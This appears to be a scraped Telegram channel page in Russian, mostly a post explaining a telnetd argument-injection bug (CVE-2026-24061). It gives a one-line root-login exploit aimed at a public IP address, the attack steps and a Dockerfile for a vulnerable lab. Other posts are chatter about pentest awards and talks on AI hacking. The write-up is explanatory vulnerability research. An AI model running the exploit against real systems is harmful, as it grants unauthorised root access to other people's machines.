вольтаж
1.47K subscribers
43 photos
6 videos
7 files
65 links
Кибершумные заметки о безопасности веба, инфры и головы

связь - @w0ltage
Download Telegram
взломать интернет бесплатно 2026

USER="-f root" telnet -a 104.16.149.244 23


вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.

что? 🐱

Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.

Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.

Без Kerberos, этот юзернейм попросту не детектился.

Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.

Новый шаблон:


/usr/bin/login " -p -h %h %?u{-f %u}{%U}"



и вот тут происходит кабум бабах ракета взрыв 🤯

1. В бинаре login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"

2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе $USER с целевым логином

3. содержимое $USER переменной никак не санитизируется

. . .
Теперь перечитай эксплойт


USER="-f root" telnet -a 104.16.149.244 23


Да это же уязвимость на argument injection!


Повторим флоу атаки 🃏

0. выставляем переменную $USER="-f root" и включаем автологин -a

1. переменная $USER не проверяется, но учитывается сервером

2. $USER подставляется в шаблон логина вместо {%U}

3. сервер получает команду /usr/bin/login -p -f root

4. бинарь login скипает аутентификацию из-за -f

5. поздравляю, ты root

———
Dockerfile для тестовой лабы


FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]



Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
Please open Telegram to view this post
VIEW IN TELEGRAM
34
план на это лето:
1. веб пробивать бесплано
2. ии ломать платно
3. репорт сдават в пентест авардс
4. макбук получат
5. покушат на награждении
15
Forwarded from Just Security
Pentest award 2026 открывает прием заявок!

Вновь у этичных хакеров появляется возможность громко заявить о своих достижениях. Можно снова делиться наработками, демонстрировать талант и профессионализм. Участники получают вдохновения и новые рабочие инсайты, а также развиваются за счет обмена уникальным опытом с коллегами со всей страны.

В этом году мы внедрили много нового, но участие, как всегда, остается бесплатным.

Главный приз за победу — макбук и статуэтка!
За вторые и третьи места призеры получат айфоны и смарт-часы.
Церемония награждения состоится 14 августа на Красном Октябре.

Отправляйте заявки на сайте, участвуйте и побеждайте!

#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
3
лучше бы блечил
20860
привет, спишь?
давно хотел признаться тебе
я...
12
Буду выступать на OFFZONE 2026, в COMMUNITY.ZONE

20 августа, 17:45 - 18:15

Расскажу как 4 месяца жал полный газ в ИИшные гонки за кнопкой взломать.

Упор сделаю на "что делать не надо", а также как сэкономить денег и чего стоит делать 😏
Please open Telegram to view this post
VIEW IN TELEGRAM
30
поздравляю с днём отключения chatgpt cyber trust access
114
вольтаж
Буду выступать на OFFZONE 2026, в COMMUNITY.ZONE 20 августа, 17:45 - 18:15 Расскажу как 4 месяца жал полный газ в ИИшные гонки за кнопкой взломать. Упор сделаю на "что делать не надо", а также как сэкономить денег и чего стоит делать 😏
этот доклад либо будет моим последним (меня отчислят из спикеров)

либо моим наследием 🙉

готовьте пиво и последние силы на сеанс в 17:45, в зале COMMUNITY.ZONE
Please open Telegram to view this post
VIEW IN TELEGRAM
11
краткий пересказ доклада
2
Forwarded from ошибка новичка
legendary
812